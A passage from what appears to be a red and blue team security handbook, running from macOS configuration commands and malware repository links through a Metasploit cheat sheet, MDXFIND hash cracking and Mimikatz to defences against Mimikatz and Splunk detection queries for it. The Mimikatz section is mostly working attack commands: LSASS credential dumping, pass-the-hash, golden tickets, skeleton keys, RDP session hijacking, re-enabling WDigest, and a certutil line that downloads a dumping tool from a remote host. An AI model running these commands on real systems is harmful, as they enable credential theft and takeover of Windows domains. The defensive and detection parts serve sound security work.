| rex field="_raw" "(?P<process_name>^[\w \(\)\-\.]+)(\b|\))\s{3,}(?P<pid>[\d]+)\s+(?P<cpu_ms_s>[\d\.]+)\s+(?P<percent_cpu_user>[\d\.]+)\s+(?P<deadlines_lt_2ms>[\d\.]+)\s+(?P<deadlines_2_to_5ms>[\d\.]+)\s+(?P<wakeups>[\d\.]+)\s+(?P<intr_pkg_idle>[\d\.]+)\s+(?P<bytes_read>[\d\.]+)\s+(?P<bytes_written>[\d\.]+)\s+(?P<pageins>[\d\.]+)\s+(?P<energy_impact>[\d\.]+)"
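The rex above is only useful if its named groups line up with the columns of the powermetrics task table, so here is the same expression applied in Python to a constructed sample of `-s tasks` output. This is an added example and not code from the handbook or from Apple; the sample lines, their values and the function names are assumptions. It also shows one quirk of the expression as written: a process name that ends in a parenthesis is captured without its closing `)`, because the `(\b|\))` alternative consumes that character.

```python
import re

# The handbook's Splunk `rex` expression, as one Python raw string.
POWERMETRICS_TASK_RE = re.compile(
    r"(?P<process_name>^[\w \(\)\-\.]+)(\b|\))\s{3,}(?P<pid>[\d]+)\s+"
    r"(?P<cpu_ms_s>[\d\.]+)\s+(?P<percent_cpu_user>[\d\.]+)\s+"
    r"(?P<deadlines_lt_2ms>[\d\.]+)\s+(?P<deadlines_2_to_5ms>[\d\.]+)\s+"
    r"(?P<wakeups>[\d\.]+)\s+(?P<intr_pkg_idle>[\d\.]+)\s+"
    r"(?P<bytes_read>[\d\.]+)\s+(?P<bytes_written>[\d\.]+)\s+"
    r"(?P<pageins>[\d\.]+)\s+(?P<energy_impact>[\d\.]+)"
)

# Constructed sample of a `powermetrics -s tasks` section (not real output).
# The banner, blank and header lines must be rejected by the parser.
SAMPLE_LOG = """\
*** Running tasks ***

Name                               ID     CPU ms/s  User%  Deadlines (<2 ms, 2-5 ms)  Wakeups (Intr, Pkg idle)  Bytes read  Bytes written  Pageins  Energy Impact
kernel_task                        0      45.23     2.10   0.00   0.00   120.50   0.00   0.00   0.00   0.00   1.20
Google Chrome Helper (Renderer)    4321   12.50     0.80   0.00   0.00   15.00    0.00   4096.00   0.00   0.00   3.40
"""


def parse_task_line(line):
    """Return a dict for one task row, or None for lines the regex rejects."""
    m = POWERMETRICS_TASK_RE.match(line)
    if m is None:
        return None
    row = m.groupdict()
    row["pid"] = int(row["pid"])
    for key in list(row):
        if key not in ("process_name", "pid"):
            row[key] = float(row[key])
    return row


def parse_powermetrics(text):
    """Parse every task row in a powermetrics text dump."""
    rows = []
    for line in text.splitlines():
        row = parse_task_line(line)
        if row is not None:
            rows.append(row)
    return rows


def top_by(rows, field, n=5):
    """Rank parsed rows by a numeric column such as energy_impact or bytes_read."""
    return sorted(rows, key=lambda r: r[field], reverse=True)[:n]


if __name__ == "__main__":
    for row in top_by(parse_powermetrics(SAMPLE_LOG), "energy_impact"):
        print(row["pid"], row["process_name"], row["energy_impact"])
```

Run against a real `-u` output file by reading it into `parse_powermetrics`; anything the expression rejects (headers, per-interval banners, names with characters outside the `[\w \(\)\-\.]` class) is simply dropped, which is worth knowing before trusting the Splunk field counts.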

macOS CONFIGURATION
Join a Wi-Fi Network
networksetup -setairportnetwork en0 WIFI_SSID WIFI_PASSWORD

Turn Wi-Fi Adapter On
networksetup -setairportpower en0 on

Firewall Service
# Show Status
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
# Enable
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on
# Disable (Default)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

Remote Apple Events
# Status
sudo systemsetup -getremoteappleevents
# Enable
sudo systemsetup -setremoteappleevents on
# Disable (Default)
sudo systemsetup -setremoteappleevents off

AirDrop
# Enable AirDrop over Ethernet and on Unsupported Macs
defaults write [Link] BrowseAllInterfaces -bool true
# Enable (Default)
defaults remove [Link] DisableAirDrop
# Disable
defaults write [Link] DisableAirDrop -bool YES

Force Launch Screen Saver
# Up to Sierra
open /System/Library/Frameworks/[Link]/Versions/A/Resources/[Link]
# From High Sierra
/System/Library/CoreServices/[Link]/Contents/MacOS/ScreenSaverEngine

Start Native TFTP Daemon
# Files will be served from /private/tftpboot.
sudo launchctl load -F /System/Library/LaunchDaemons/[Link] && \
sudo launchctl start [Link]

Activate/Deactivate the ARD Agent and Helper
# Activate and Restart the ARD Agent and Helper
sudo /System/Library/CoreServices/RemoteManagement/[Link]/Contents/Resources/kickstart -activate -restart -agent -console
# Deactivate and Stop the Remote Management Service
sudo /System/Library/CoreServices/RemoteManagement/[Link]/Contents/Resources/kickstart -deactivate -stop

Enable/Disable Remote Desktop Sharing
# Allow Access for All Users and Give All Users Full Access
sudo /System/Library/CoreServices/RemoteManagement/[Link]/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all
# Disable ARD Agent and Remove Access Privileges for All Users
sudo /System/Library/CoreServices/RemoteManagement/[Link]/Contents/Resources/kickstart -deactivate -configure -access -off

Remove Apple Remote Desktop Settings
sudo rm -rf /var/db/RemoteManagement ; \
sudo defaults delete /Library/Preferences/[Link] ; \
defaults delete ~/Library/Preferences/[Link] ; \
sudo rm -r /Library/Application\ Support/Apple/Remote\ Desktop/ ; \
rm -r ~/Library/Application\ Support/Remote\ Desktop/ ; \
rm -r ~/Library/Containers/[Link]

REFERENCE:
[Link]
with-a-Mac/
[Link]
[Link]
[Link]

MACOS_Versions
ALL INFORMATIONAL MacOS

Version                  Date       Darwin   Latest
Rhapsody Developer       31-Aug-97  DR2
OS X Server 1.0          16-Mar-99  1.2v3
OS X Developer           16-Mar-99  DP4
OS X Beta Kodiak         13-Sep-00  1.2.1
OS X 10.0 Cheetah        24-Mar-01  1.3.1    10.0.4
OS X 10.1 Puma           25-Sep-01  1.4.1/5  10.1.5
OS X 10.2 Jaguar         24-Aug-02  6        10.2.8
OS X 10.3 Panther        24-Oct-03  7        10.3.9
OS X 10.4 Tiger          29-Apr-05  8        10.4.11
OS X 10.5 Leopard        26-Oct-07  9        10.5.8
OS X 10.6 Snow Leopard   09-Jun-08  10       10.6.8 v1.1
OS X 10.7 Lion           20-Jul-11  11       10.7.5
OS X 10.8 Mountain Lion  25-Jul-12  12       10.8.5
OS X 10.9 Mavericks      22-Oct-13  13       10.9.5
OS X 10.10 Yosemite      16-Oct-14  14       10.10.5
OS X 10.11 El Capitan    30-Sep-15  15       10.11.6
macOS 10.12 Sierra       20-Sep-16  16       10.12.6
macOS 10.13 High Sierra  25-Sep-17  17       10.13.6
macOS 10.14 Mojave       24-Sep-18  18       10.14.6
macOS 10.15 Catalina     7-Oct-19   19       10.15.2

REFERENCE:
[Link]

MALWARE_Resources
BLUE TEAM REVERSE ENG ALL

MALWARE REPOSITORIES
Clean MX
Realtime database of malware and malicious domains.
[Link]

Contagio
A collection of recent malware samples and analyses.
[Link]

Exploit Database
Exploit and shellcode samples.
[Link]

Infosec - CERT-PA
Malware samples collection and analysis.
[Link]

InQuest Labs
Ever-growing searchable corpus of malicious Microsoft documents.
[Link]

Malpedia
A resource providing rapid identification and actionable context
for malware investigations.
[Link]

Malshare
Large repository of malware actively scraped from malicious sites.
[Link]

Objective-See
MacOS malware samples
[Link]

Tracker h3x
Aggregator for malware corpus tracker and malicious download sites.
[Link]

VirusBay
Community-Based malware repository and social network.
[Link]

VirusShare
Malware repository, registration required.
[Link]

Zeltser's Sources
A list of malware sample sources put together by Lenny Zeltser.
[Link]

VX-UNDERGROUND
Polyswarm supported malware samples free for all.
[Link]

theZOO
A repository of LIVE malware for your own joy and pleasure. theZoo
is a project created to make the possibility of malware analysis
open and available to the public. [Link]
[Link]

AlphaSecLab
Malware writeups on samples
[Link]

COMMAND & CONTROL RESEARCH

C2 Matrix
It is the golden age of Command and Control (C2) frameworks. The
goal of this site is to point you to the best C2 framework for your
needs based on your adversary emulation plan and the target
environment. Take a look at the matrix or use the questionnaire to
determine which fits your needs.
[Link]

REFERENCE:
[Link]

MDXFIND / MDXSPLIT
RED TEAM PASSWORD CRACKING ALL
MDXFIND is a program which allows you to run large numbers of
unsolved hashes of any type, using many algorithms concurrently,
against a large number of plaintext words and rules, very quickly.
Its main purpose was to deal with large lists (20 million, 50
million, etc.) of unsolved hashes and run them against new
dictionaries as you acquire them.

So when would you use MDXFIND on a pentest? If you dump a database
tied to website authentication and the hashes are not cracking with
standard attack plans, the hashes may have been generated by a unique
nested hashing series. If you are able to view the source code of
said website and see the custom hashing function, you can direct
MDXFIND to replicate that hashing series. If not, you can still run
MDXFIND using some of the 'Generic Attack Plans' below. MDXFIND is
tailored toward intermediate to expert level password cracking but
is extremely powerful and flexible.

Example website SHA1 custom hashing function performing multiple
iterations:

$hash = sha1($password . $salt);
for ($i = 1; $i <= 65000; ++$i)
{
    $hash = sha1($hash . $salt);
}

MDXFIND
COMMAND STRUCTURE: THREE METHODS 1-STDOUT 2-STDIN 3-FILE

1- Reads hashes coming from cat (or other) commands' stdout.
cat [Link] | mdxfind -h <regex #type> -i <#iterations> [Link] > [Link]

2- Takes stdin from outside attack sources in place of [Link] when
using the option '-f' to specify the [Link] file location and the
keyword 'stdin'.
[Link] ?d?d?d?d?d?d | mdxfind -h <regex #type> -i <#iterations> -f [Link] stdin > [Link]

3- Specify the file location with '-f' and no external stdout/stdin
sources.
mdxfind -h <regex #type> -i <#iterations> -f [Link] [Link] > [Link]

[FULL LIST OF OPTIONS]
-a  Do email address munging
-b  Expand each word into unicode, best effort
-c  Replace each special char (<>&, etc) with XML equivalents
-d  De-duplicate wordlists, best effort...but best to do ahead of time
-e  Extended search for truncated hashes
-p  Print source (filename) of found plain-texts
-q  Internal iteration counts for SHA1MD5x, and others. For example,
    if you have a hash that is SHA1(MD5(MD5(MD5(MD5($pass))))), you
    would set -q to 5.
-g  Rotate calculated hashes to attempt match to input hash
-s  File to read salts from
-u  File to read Userid/Usernames from
-k  File to read suffixes from
-n  Number of digits to append to passwords. Other options, like
    -n 6x would append 6 digit hex values, and 8i would append all
    ipv4 dotted-quad IP-addresses.
-i  The number of iterations for each hash
-t  The number of threads to run
-f  File to read hashes from, else stdin
-l  Append CR/LF/CRLF and print in hex
-r  File to read rules from
-v  Do not mark salts as found.
-w  Number of lines to skip from first wordlist
-y  Enable directory recursion for wordlists
-z  Enable debugging information/hash results
-h  The hash types: 459 TOTAL HASHES SUPPORTED

GENERIC ATTACK PLANS
This is a good general purpose MDXFIND command to run your hashes
against if you suspect them to be "non-standard" nested hashing
sequences. This command says "Run all hashes against [Link] using
10 iterations except ones having a salt, user, or md5x value in the
name." It's smart to skip salted/user hash types in MDXFIND unless
you are confident a salt value has been used.

cat [Link] | mdxfind -h ALL -h '!salt,!user,!md5x' -i 10 [Link] > [Link]

The developer of MDXFIND also recommends running the below command
options as a good general purpose attack:
cat [Link] | mdxfind -h '^md5$,^sha1$,^md5md5pass$,^md5sha1$' -i 5 [Link] > [Link]

And you could add a rule attack as well:
cat [Link] | mdxfind -h '^md5$,^sha1$,^md5md5pass$,^md5sha1$' -i 5 [Link] -r [Link] > [Link]

GENERAL NOTES ABOUT MDXFIND
-Can do multiple hash types/files all during a single attack run.
 cat sha1/*.txt sha256/*.txt md5/*.txt salted/*.txt | mdxfind
-Supports 459 different hash types/sequences
-Can take input from special 'stdin' mode
-Supports VERY large hashlists (100mil) and 10kb character passwords
-Supports using hashcat rule files to integrate with dictionary
-Option '-z' outputs ALL viable hashing solutions and the file can grow
 very large
-Supports including/excluding hash types by using simple regex
 parameters
-Supports multiple iterations (up to 4 billion times) by tweaking the
 -i parameter, for instance:
 MD5x01 is the same as md5($pass)
 MD5x02 is the same as md5(md5($pass))
 MD5x03 is the same as md5(md5(md5($pass)))
 ...
 MD5x10 is the same as md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))))
-Separate out -usernames -email -ids -salts to create custom attacks
-If you are doing brute-force attacks, then hashcat is probably the
 better route
-When MDXfind finds any solution, it outputs the kind of solution
 found, followed by the hash, followed by the salt and/or password.
 For example:
 Solution HASH:PASSWORD
 MD5x01 000012273bc5cab48bf3852658b259ef:1EbOTBK3
 MD5x05 033b111073e5f64ee59f0be9d6b8a561:08061999
 MD5x09 aadb9d1b23729a3e403d7fc62d507df7:1140
 MD5x09 326d921d591162eed302ee25a09450ca:1761974
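To make the MD5xNN notation above and the PHP loop quoted at the start of this entry concrete, the following Python computes both chains exactly as described (each round hashes the hex digest of the previous one, as PHP's md5() and sha1() return it) and shows the check a site using such a scheme has to perform on every login. This is an added example, not MDXFIND's code; the function names, the sample password and the salt are constructed.

```python
import hashlib
import hmac


def md5x(password: str, iterations: int) -> str:
    """MD5xNN: md5 applied `iterations` times, each round over the lower-case
    hex digest of the previous round. md5x(p, 1) is md5($pass),
    md5x(p, 2) is md5(md5($pass)), and so on."""
    data = password.encode()
    for _ in range(iterations):
        data = hashlib.md5(data).hexdigest().encode()
    return data.decode()


def site_sha1_salted(password: str, salt: str, rounds: int = 65000) -> str:
    """The website scheme quoted above: sha1(pass . salt), then
    sha1(hash . salt) repeated `rounds` times over the hex digest."""
    digest = hashlib.sha1((password + salt).encode()).hexdigest()
    for _ in range(rounds):
        digest = hashlib.sha1((digest + salt).encode()).hexdigest()
    return digest


def verify_site_password(candidate: str, salt: str, stored: str,
                         rounds: int = 65000) -> bool:
    """What the site's login check does on each attempt: recompute the whole
    chain and compare in constant time."""
    return hmac.compare_digest(site_sha1_salted(candidate, salt, rounds), stored)


if __name__ == "__main__":
    # Constructed demo values, not taken from any real data set.
    stored = site_sha1_salted("correct horse", "NaCl")
    print(md5x("abc", 1), md5x("abc", 2))
    print(verify_site_password("correct horse", "NaCl", stored))
```

The round count is the whole story for the -i and -q options: they must equal the number of rounds the application applied, or no candidate will ever match. From the defending side, an ad-hoc chain like this should be replaced by a standard password KDF (bcrypt, scrypt, Argon2 or PBKDF2) with a per-user salt, which gives the same slowdown with a vetted construction.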

MDSPLIT
When cracking large lists of hashes from multiple file locations,
MDSPLIT will help match which files the cracked hashes were found
in, while also outputting them into separate files based on hash
type. Additionally it will remove the found hashes from the
original hash file.

COMMAND STRUCTURE: THREE METHODS 1-STDOUT 2-STDIN 3-FILE

1- Matching MDXFIND results files with their original hash_orig.txt
files.
cat hashes_out/out_results.txt | mdsplit hashes_orig/hash_orig.txt

OR perform matching against a directory of original hashes and their
results.
cat hashes_out/* | mdsplit hashes_orig/*

2- Piping MDXFIND directly into MDSPLIT to sort results in real time.
cat *.txt | mdxfind -h ALL -h '!salt,!user,!md5x' -i 10 [Link] | mdsplit *.txt

3- Specifying a file location in MDXFIND to match results in real
time.
mdxfind -h ALL -f [Link] -i 10 [Link] | mdsplit [Link]

GENERAL NOTES ABOUT MDSPLIT
-MDSPLIT will append the final hash solution to the end of the new
 filename. For example, if we submitted '[Link]' and the solution
 to the hashes was "MD5x01" then the results file would be
 'hashes.MD5x01'. If multiple hash solutions are found then MDSPLIT
 knows how to deal with this, and will then remove each of the
 solutions from [Link], and place them into 'hashes.MD5x01',
 'hashes.MD5x02', 'hashes.SHA1'... and so on.

-MDSPLIT can handle sorting multiple hash files, types, and their
 results all at one time. Any solutions will be automatically
 removed from all of the source files by MDSPLIT, and tabulated into
 the correct solved files. For example:
 cat dir1/*.txt dir2/*.txt dir3/*.txt | mdxfind -h '^md5$,^sha1$,^sha256$' -i 10 [Link] | mdsplit dir1/*.txt dir2/*.txt dir3/*.txt

REFERENCE:
[Link]

METASPLOIT
RED TEAM C2 WINDOWS/LINUX/MacOS
Metasploit is the world’s most used penetration testing framework.

GENERAL INFO
msfconsole                          Launch program
version                             Display current version
msfupdate                           Pull the weekly update
makerc <[Link]>                     Saves recent commands to file
msfconsole -r <[Link]>              Loads a resource file

EXPLOIT/SCAN/MODULE
use <MODULE>                        Set the exploit to use
set payload <PAYLOAD>               Set the payload
show options                        Show all options
set <OPTION> <SETTING>              Set a setting
exploit or run                      Execute the exploit

SESSION HANDLING
sessions -l                         List all sessions
sessions -i <ID>                    Interact/attach to session
background or ^Z                    Detach from session

DATABASE
service postgresql start            Start DB
msfdb init                          Init the DB
db_status                           Should say connected
hosts                               Show hosts in DB
services                            Show ports in DB
vulns                               Show all vulns found

METERPRETER SESSION CMDS
sysinfo                             Show system info
ps                                  Show running processes
kill <PID>                          Terminate a process
getuid                              Show your user ID
upload / download                   Upload / download a file
pwd / lpwd                          Print working directory (local / remote)
cd / lcd                            Change directory (local / remote)
cat                                 Show contents of a file
edit <FILE>                         Edit a file (vim)
shell                               Drop into a shell on the target machine
migrate <PID>                       Switch to another process
hashdump                            Show all pw hashes (Windows only)
idletime                            Display idle time of user
screenshot                          Take a screenshot
clearev                             Clear the logs

METERPRETER PRIV ESCALATION
use priv                            Load the script; Use privileges
getsystem                           Elevate your privs
getprivs                            Elevate your privs

METERPRETER TOKEN STEALING
use incognito                       Load the script
list_tokens -u                      Show all tokens
impersonate_token DOMAIN\USER       Use token
drop_token                          Stop using token

METERPRETER NETWORK PIVOT
portfwd [ADD/DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389
                                    Enable port forwarding
route add <SUBNET> <MASK>           Pivot through a session by adding a route within msf
route add [Link]/24                 Pivot through a session by adding a route within msf
route add [Link]/24 -d              Deleting a route within msf

SEARCH EXPLOITS/PAYLOADS/MODULES
search <TERM>                       Searches all exploits, payloads, and auxiliary modules
show exploits                       Show all exploits
show payloads                       Show all payloads
show auxiliary                      Show all auxiliary modules (like scanners)
show all                            *

POPULAR MODULES/EXPLOITS
use auxiliary/scanner/smb/smb_enumshares
                                    SMB Share Enumeration
use auxiliary/scanner/smb/smb_ms17_010
                                    MS17-010 SMB RCE Detection
use exploit/windows/smb/ms17_010_eternalblue
                                    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
use exploit/windows/smb/ms17_010_psexec
                                    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
use exploit/windows/smb/ms08_067_netapi
                                    MS08-067 Microsoft Server Service Relative Path Stack Corruption
use exploit/windows/smb/psexec      Microsoft Windows Authenticated User Code Execution
use exploit/multi/ssh/sshexec       SSH User Code Execution (good for using meterpreter)
use post/windows/gather/arp_scanner Windows Gather ARP Scanner
use post/windows/gather/enum_applications
                                    Windows Gather Installed Application Enumeration
run getgui -e                       Enables RDP for Windows in meterpreter session

REFERENCE:
[Link]
[Link]
[Link]
[Link]
and-reverse-tunneling-with-meterpreter-1e747e7fa901

MIMIKATZ
RED TEAM ESCALATE PRIV WINDOWS
Mimikatz is a leading post-exploitation tool that dumps passwords
from memory, as well as hashes, PINs and Kerberos tickets.

QUICK USAGE
log
privilege::debug

SEKURLSA
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrator /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

KERBEROS
kerberos::list /export
kerberos::ptt c:\[Link]
kerberos::golden /admin:administrator /domain:[Link] /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:[Link]

CRYPTO
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export

VAULT / LSADUMP
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:[Link]
COMMAND                   DESCRIPTION
CRYPTO::Certificates      list/export certificates
KERBEROS::Golden          create golden/silver/trust tickets
KERBEROS::List            list all user tickets (TGT and TGS) in user memory. No
                          special privileges required since it only displays the
                          current user's [Link] to functionality of "klist".
KERBEROS::PTT             pass the ticket. Typically used to inject a stolen or
                          forged Kerberos ticket (golden/silver/trust).
LSADUMP::DCSync           ask a DC to synchronize an object (get password data for
                          account). No need to run code on DC.
LSADUMP::LSA              Ask LSA Server to retrieve SAM/AD enterprise (normal,
                          patch on the fly or inject). Use to dump all Active
                          Directory domain credentials from a Domain Controller or
                          [Link] dump file. Also used to get a specific account
                          credential such as krbtgt with the parameter /name:
                          "/name:krbtgt"
LSADUMP::SAM              get the SysKey to decrypt SAM entries (from registry or
                          hive). The SAM option connects to the local Security
                          Account Manager (SAM) database and dumps credentials for
                          local accounts. This is used to dump all local
                          credentials on a Windows computer.
LSADUMP::Trust            Ask LSA Server to retrieve Trust Auth Information (normal
                          or patch on the fly). Dumps trust keys (passwords) for
                          all associated trusts (domain/forest).
MISC::AddSid              Add to SIDHistory to user account. The first value is the
                          target account and the second value is the account/group
                          name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
MISC::MemSSP              Inject a malicious Windows SSP to log locally
                          authenticated credentials.
MISC::Skeleton            Inject Skeleton Key into LSASS process on Domain
                          Controller. This enables all user authentication to the
                          Skeleton Key patched DC to use a "master password" (aka
                          Skeleton Keys) as well as their usual password.
PRIVILEGE::Debug          get debug rights (this or Local System rights is required
                          for many Mimikatz commands).
SEKURLSA::Ekeys           list Kerberos encryption keys
SEKURLSA::Kerberos        List Kerberos credentials for all authenticated users
                          (including services and computer account)
SEKURLSA::Krbtgt          get Domain Kerberos service account (KRBTGT) password data
SEKURLSA::LogonPasswords  lists all available provider credentials. This usually
                          shows recently logged on user and computer credentials.
SEKURLSA::Pth             Pass-the-Hash and Over-Pass-the-Hash
SEKURLSA::Tickets         Lists all available Kerberos tickets for all recently
                          authenticated users, including services running under the
                          context of a user account and the local computer's AD
                          computer account. Unlike kerberos::list, sekurlsa uses
                          memory reading and is not subject to key export
                          restrictions. sekurlsa can access tickets of other
                          sessions (users).
TOKEN::List               list all tokens of the system
TOKEN::Elevate            impersonate a token. Used to elevate permissions to
                          SYSTEM (default) or find a domain admin token on the box
TOKEN::Elevate            impersonate a token with Domain Admin credentials.
  /domainadmin

Mimikatz - Execute commands
SINGLE COMMAND
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

MULTIPLE COMMANDS (Mimikatz console)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

Mimikatz - Extract passwords
**Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+.
It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012
but clear text is still enabled.

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1

!!!!To take effect, conditions are required:
Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
  Adding requires lock
  Removing requires signout
Win10:
  Adding requires signout
  Removing requires signout
Win2016:
  Adding requires lock
  Removing requires reboot

Mimikatz - Pass-The-Hash
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

Mimikatz - Mini Dump
Dump the lsass process.
# HTTP method
certutil -urlcache -split -f [Link] C:\Users\Public\[Link]
C:\Users\Public\[Link] -accepteula -ma [Link] [Link]

# SMB method
net use Z: [Link]
Z:\[Link] -accepteula -ma [Link] [Link]

Then load it inside Mimikatz.
mimikatz # sekurlsa::minidump [Link]
Switch to minidump
mimikatz # sekurlsa::logonPasswords

Mimikatz - Golden ticket
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
Example
.\mimikatz "kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

Mimikatz - Skeleton key
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop [Link]:3389 -u test -p mimikatz -d pentestlab

Mimikatz - RDP session takeover
Run [Link] as the SYSTEM user; you can connect to any session
without a password.
privilege::debug
token::elevate
ts::remote /id:2

# get the Session ID you want to hijack
query user
create sesshijack binpath= "[Link] /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack

Mimikatz - Credential Manager & DPAPI
# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

# check the file with mimikatz
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0

# find master key
$ mimikatz !sekurlsa::dpapi

# use master key
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

REFERENCE:
[Link]
[Link]
%20and%20Resources/Windows%
[Link]
[Link]

MIMIKATZ_Defend
BLUE TEAM CONFIGURATION/HUNT WINDOWS
Methods to defend against and detect mimikatz usage

MIMIKATZ DEFENSE
Disable Debug Permissions
Allow only a certain group to have debug permissions:
Group Policy Management Editor -> Windows Settings -> Security
Settings -> Local Policies -> User Rights Assignment -> Debug
programs -> Define these policy settings:

Disable WDigest Protocol
Don't allow plaintext passwords in LSASS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential DWORD 0

Enable LSA Protection
Create registry key RunAsPPL under:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
RunAsPPL DWORD 1

Restricted Admin Mode
Create registry key DisableRestrictedAdmin under:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
DisableRestrictedAdmin DWORD 0
Create registry key DisableRestrictedAdminOutboundCreds under:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
DisableRestrictedAdminOutboundCreds DWORD 1
Ensure the "Restrict delegation of credentials to remote servers"
policy is enforced across the domain, set to "Require Restricted
Admin".

Change Credential Caching to 0
Change the configuration setting to zero to disallow credential
caching:
Computer Configuration -> Windows Settings -> Local Policy ->
Security Options -> Interactive Logon: Number of previous logons to
cache -> 0

Enable Protected Users Group
The group enables domain administrators to protect privileged users
like Local Administrators. Accounts can be added into the "Protected
Users" group from PowerShell by executing the following command:
Add-ADGroupMember -Identity 'Protected Users' -Members Alice

DETECT MIMIKATZ
Sysmon Event 10 (Process Accessed)
Splunk query similar to this:
EventCode=10 | where (GrantedAccess="0x1010" AND TargetImage LIKE "%[Link]")

Windows Event 4656
Splunk query similar to this:
EventCode=4656 OR EventCode=4663 | eval HandleReq=case(EventCode=4656 AND Object_Name LIKE "%[Link]" AND Access_Mask=="0x143A", Process_ID) | where (HandleReq=Process_ID)
or
EventCode=4656 | where (Object_Name LIKE "%[Link]" AND Access_Mask=="0x143A")

Sysmon Event 1 (ProcessCreate) & Event 10 (ProcessAccessed)
Elaborate a correlation rule
SEQUENCE:
1. EventCode=1 | where (match(ParentImage, "[Link]") AND match(IntegrityLevel, "high"))
2. EventCode=10 | where (match(GrantedAccess, "0x1010") AND !match(SourceImage, "svchost\.exe") AND match(TargetImage, "lsass\.exe"))
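The two Splunk queries and the correlation rule above reduce to a handful of field tests, and the following Python applies those same tests to a constructed set of key=value events so the logic can be checked offline before it goes into a SIEM. This is an added example and not part of the handbook or of any vendor's detection content; the event line format, the sample paths and the function names are assumptions. The Sysmon test carries the svchost.exe exclusion from step 2 of the correlation rule.

```python
import re

# Constructed sample events in key=value form (not real Sysmon or Security
# log output). The second and fourth lines are the ones that should fire.
SAMPLE_EVENTS = [
    r"EventCode=10 SourceImage=C:\Windows\System32\svchost.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventCode=10 SourceImage=C:\Users\Public\tool.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventCode=10 SourceImage=C:\Users\Public\tool.exe "
    r"TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1010",
    r"EventCode=4656 Object_Name=C:\Windows\System32\lsass.exe "
    r"Access_Mask=0x143A Process_ID=0x1a2c",
    r"EventCode=4656 Object_Name=C:\Windows\System32\lsass.exe "
    r"Access_Mask=0x100000 Process_ID=0x1a2c",
]

KV_RE = re.compile(r"(\w+)=(\S+)")

# 0x1010 = PROCESS_QUERY_LIMITED_INFORMATION (0x1000) | PROCESS_VM_READ (0x0010),
# the GrantedAccess value both Sysmon rules above key on.
SYSMON_LSASS_ACCESS = "0x1010"
# Access_Mask the Event 4656 query keys on; compared lower-cased.
SECURITY_LSASS_MASK = "0x143a"


def parse_event(line):
    """Split a key=value line into a dict (values here contain no spaces)."""
    return dict(KV_RE.findall(line))


def image_name(path):
    """Basename of a Windows path, lower-cased, for LIKE '%lsass.exe' tests."""
    return path.rsplit("\\", 1)[-1].lower()


def sysmon10_lsass_access(ev, exclude_sources=("svchost.exe",)):
    """Sysmon EventCode 10: a non-excluded process opened lsass.exe with 0x1010.
    exclude_sources mirrors the !match(SourceImage, svchost) clause of the rule."""
    return (
        ev.get("EventCode") == "10"
        and ev.get("GrantedAccess", "").lower() == SYSMON_LSASS_ACCESS
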